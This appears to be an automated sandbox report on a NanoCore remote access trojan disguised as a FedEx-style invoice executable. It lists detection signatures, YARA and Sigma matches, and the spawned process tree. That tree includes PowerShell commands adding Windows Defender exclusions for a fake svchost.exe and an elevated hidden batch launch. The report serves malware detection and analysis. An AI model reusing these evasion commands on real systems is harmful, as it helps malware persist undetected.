Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report CN-Invoice-XXXXX9808-19011143287990.exe

Overview

General Information

Sample Name:CN-Invoice-XXXXX9808-19011143287990.exe
Analysis ID:355838
MD5:a656f522f604872e02daee9dbc458d9c
SHA1:e463d219a1d4dbde375e4f53c2fc250d6ee9d7f1
SHA256:a0ebcb3078763eb8acca534831ef9ca1a213347328698aa3cda7c5bd23cd81d8
Tags:exeFedExNanoCoreRAT

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide a thread from the debugger
Drops PE files with benign system names
Executable has a suspicious name (potential lure to open the executable)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to delay execution (extensive OutputDebugStringW loop)
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN-Invoice-XXXXX9808-19011143287990.exe (PID: 5604 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' MD5: A656F522F604872E02DAEE9DBC458D9C)
    • powershell.exe (PID: 1552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 5380 cmdline: 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6268 cmdline: 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6552 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6752 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 7108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 6188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 2564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6356 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6364 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6484 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6508 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6772 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6944 cmdline: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: A656F522F604872E02DAEE9DBC458D9C)
      • powershell.exe (PID: 5584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AdvancedRun.exe (PID: 844 cmdline: 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • svchost.exe (PID: 6964 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 7092 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 7152 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6172 cmdline: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' MD5: A656F522F604872E02DAEE9DBC458D9C)
  • svchost.exe (PID: 4568 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4560 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6684 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x110c5:$x1: NanoCore.ClientPluginHost
  • 0x43ee5:$x1: NanoCore.ClientPluginHost
  • 0x76b05:$x1: NanoCore.ClientPluginHost
  • 0x11102:$x2: IClientNetworkHost
  • 0x43f22:$x2: IClientNetworkHost
  • 0x76b42:$x2: IClientNetworkHost
  • 0x14c35:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x47a55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x7a675:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x10e2d:$a: NanoCore
    • 0x10e3d:$a: NanoCore
    • 0x11071:$a: NanoCore
    • 0x11085:$a: NanoCore
    • 0x110c5:$a: NanoCore
    • 0x43c4d:$a: NanoCore
    • 0x43c5d:$a: NanoCore
    • 0x43e91:$a: NanoCore
    • 0x43ea5:$a: NanoCore
    • 0x43ee5:$a: NanoCore
    • 0x7686d:$a: NanoCore
    • 0x7687d:$a: NanoCore
    • 0x76ab1:$a: NanoCore
    • 0x76ac5:$a: NanoCore
    • 0x76b05:$a: NanoCore
    • 0x10e8c:$b: ClientPlugin
    • 0x1108e:$b: ClientPlugin
    • 0x110ce:$b: ClientPlugin
    • 0x43cac:$b: ClientPlugin
    • 0x43eae:$b: ClientPlugin
    • 0x43eee:$b: ClientPlugin
    Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604Nanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xb77275:$x1: NanoCore.ClientPluginHost
    • 0xb95f49:$x1: NanoCore.ClientPluginHost
    • 0xbb4b30:$x1: NanoCore.ClientPluginHost
    • 0xb772d6:$x2: IClientNetworkHost
    • 0xb95faa:$x2: IClientNetworkHost
    • 0xbb4b91:$x2: IClientNetworkHost
    • 0xb7c6db:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0xb8a64d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0xb9b3af:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0xba9321:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0xbb9f96:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0xbc7f08:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604JoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 1 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe38d:$x1: NanoCore.ClientPluginHost
      • 0xe3ca:$x2: IClientNetworkHost
      • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe105:$x1: NanoCore Client.exe
      • 0xe38d:$x2: NanoCore.ClientPluginHost
      • 0xf9c6:$s1: PluginCommand
      • 0xf9ba:$s2: FileCommand
      • 0x1086b:$s3: PipeExists
      • 0x16622:$s4: PipeCreated
      • 0xe3b7:$s5: IClientLoggingHost
      0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xe0f5:$a: NanoCore
        • 0xe105:$a: NanoCore
        • 0xe339:$a: NanoCore
        • 0xe34d:$a: NanoCore
        • 0xe38d:$a: NanoCore
        • 0xe154:$b: ClientPlugin
        • 0xe356:$b: ClientPlugin
        • 0xe396:$b: ClientPlugin
        • 0xe27b:$c: ProjectData
        • 0xec82:$d: DESCrypto
        • 0x1664e:$e: KeepAlive
        • 0x1463c:$g: LogClientMessage
        • 0x10837:$i: get_Connected
        • 0xefb8:$j: #=q
        • 0xefe8:$j: #=q
        • 0xf004:$j: #=q
        • 0xf034:$j: #=q
        • 0xf050:$j: #=q
        • 0xf06c:$j: #=q
        • 0xf09c:$j: #=q
        • 0xf0b8:$j: #=q
        0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xe38d:$x1: NanoCore.ClientPluginHost
        • 0xe3ca:$x2: IClientNetworkHost
        • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        Click to see the 9 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 7108, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Sigma detected: Executables Started in Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
        Sigma detected: Execution in Non-Executable FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
        Sigma detected: Suspicious Program Location Process StartsShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
        Sigma detected: Suspicious Svchost ProcessShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
        Sigma detected: System File Execution Location AnomalyShow sources
        Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944
        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
        Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, NewProcessName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, OriginalFileName: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6772, ProcessCommandLine: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' , ProcessId: 6944

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeReversingLabs: Detection: 25%
        Multi AV Scanner detection for submitted fileShow sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exeReversingLabs: Detection: 25%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exeJoe Sandbox ML: detected

        Compliance:

        barindex
        Uses 32bit PE filesShow sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbo source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdbb440 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: fwpuclnt.pdb\4B0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc.pdbZ4\0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb+_ source: WerFault.exe, 0000001E.00000003.353042308.00000000057F5000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3Zl source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: winnsi.pdb03 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdbJ source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb= source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb@! source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdbF source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: i.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: indows.Forms.pdb&& source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb@4V0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ility.pdbn source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
